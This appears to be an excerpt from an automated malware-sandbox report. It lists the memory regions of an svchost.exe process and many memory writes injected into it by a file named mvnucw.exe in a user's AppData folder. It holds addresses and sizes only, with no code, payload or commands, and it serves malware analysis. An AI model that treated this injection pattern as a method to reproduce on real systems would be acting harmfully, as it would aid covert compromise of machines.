private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable, Executable	Region Actions
imm32.dll	0x00080000	0x000a8fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000080000	0x00080000	0x00086fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00091fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x0014ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00150000	0x001b6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000280000	0x00280000	0x0037ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000380000	0x00380000	0x0047ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000510000	0x00510000	0x0051ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000520000	0x00520000	0x006a7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006b0000	0x006b0000	0x00830fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000840000	0x00840000	0x01c3ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001c40000	0x01c40000	0x02032fff	Pagefile Backed Memory	Readable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff3000	0x7fff3000	0x7fff3fff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0xff5a0000	0xff5aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000140000000	0x140000000	0x140024fff	Private Memory	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefede0000	0x7fefefe2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff5d0000	0x7feff6a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd6fff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions
For performance reasons, the remaining 80 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x50000, size = 544	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x60000, size = 72	88	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0xff5a246c, size = 22	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140000000, size = 1024	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140001000, size = 96768	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019000, size = 25088	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140020000, size = 2264	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140020000, size = 512	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140021000, size = 6144	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140023000, size = 1536	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140024000, size = 1536	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 21	4	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20000, size = 16	79	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x70000, size = 48	86	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 7	5	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019190, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 9	3	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019198, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 18	3	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191a0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 17	6	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191a8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191b0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 6	5	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191b8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 11	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191c0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 8	3	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191c8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 5	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191d0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 15	7	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191d8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191e0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191e8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191f0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400191f8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019200, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 12	4	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019208, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019210, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019218, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019220, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 10	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019228, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 19	7	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019230, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019238, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 22	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019240, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019248, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019250, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019258, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019260, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 13	6	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019268, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 14	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019270, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019278, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019280, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019288, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 25	4	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019010, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 23	3	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019018, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019020, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019028, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019030, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019038, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019040, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 24	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019048, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 20	2	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019050, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019058, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019060, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019068, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019070, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 28	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019078, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 16	3	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019080, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019088, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019090, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019098, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190a0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190a8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190b0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190b8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019000, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019298, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400192a0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190c8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190d0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190d8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190e0, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190e8, size = 8	1	Fn Data
